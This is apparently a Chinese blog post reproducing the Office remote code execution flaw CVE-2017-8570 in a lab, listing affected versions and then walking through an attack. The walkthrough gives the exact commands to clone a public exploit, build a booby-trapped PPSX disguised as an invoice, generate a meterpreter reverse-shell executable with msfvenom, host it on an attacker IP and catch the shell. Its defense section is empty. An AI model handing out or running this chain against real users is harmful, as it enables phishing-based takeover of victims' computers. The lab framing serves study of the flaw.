Office 远程代码执行漏洞(CVE-2017-8570)复现

【漏洞详情】

  • Office一直是主流的办公软件,当 Microsoft Office 软件无法正确处理内存中的对象时,其中存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用经特殊设计的文件在当前用户的安全上下文中执行操作。CVE-2017-8570这个漏洞影响office所有发行版本,当用户不经意点击了我们的恶意PPSX文件,那么我们就可以直接获取到他的用户权限,危害性十分高。

【验证详情】

  • 影响版本

Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

  • 验证过程

  • 1.这里使用的是Windows2007 sp1作为我的靶机,接着使用meatasploit工具进行漏洞复现。

  • 2.首先从网上下载CVE-2017-8570漏洞exp到本地目录:

git clone https://github.com/tezukanice/Office8570.git

在这里插入图片描述

  • 3.切换到Office8570目录下,然后新建目录,将原本已有的ppsx文件另存到template。

在这里插入图片描述

  • 4.生成恶意的PPSX文件到本地,使用命令如下,这里的IP是kali的IP:

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.233.132/logo.doc
在这里插入图片描述

  • 5.使用windows的meterpreter的反弹木马生成反弹shell的exe文件。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.233.132 LPORT=6666 -f exe > shell.exe

在这里插入图片描述

  • 6.设置监听,用于在80端口监听,等待恶意ppsx文件的执行,继而接收ppsx请求来下载执行kali本地反弹木马shell。

python cve-2017-8570_toolkit.py -M exp -e http://192.168.233.132/shell.exe -l shell.exe

在这里插入图片描述

  • 7.打开metasploit工具,使用multi/handler加载攻击模块,设置监听。

在这里插入图片描述

  • 8.将我们刚才生成的恶意的ppsx文件放在目标主机上执行,这里就是模拟用户点击黑客发送的恶意文件。

在这里插入图片描述

  • 9.点击运行Invoce.ppsx文件。

在这里插入图片描述

  • 10.查看是否接收到目标机发送的获取payload的请求,可见接收成功:

在这里插入图片描述

  • 11.查看MSF状态,已经获得shell。

在这里插入图片描述

【防御方式】

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值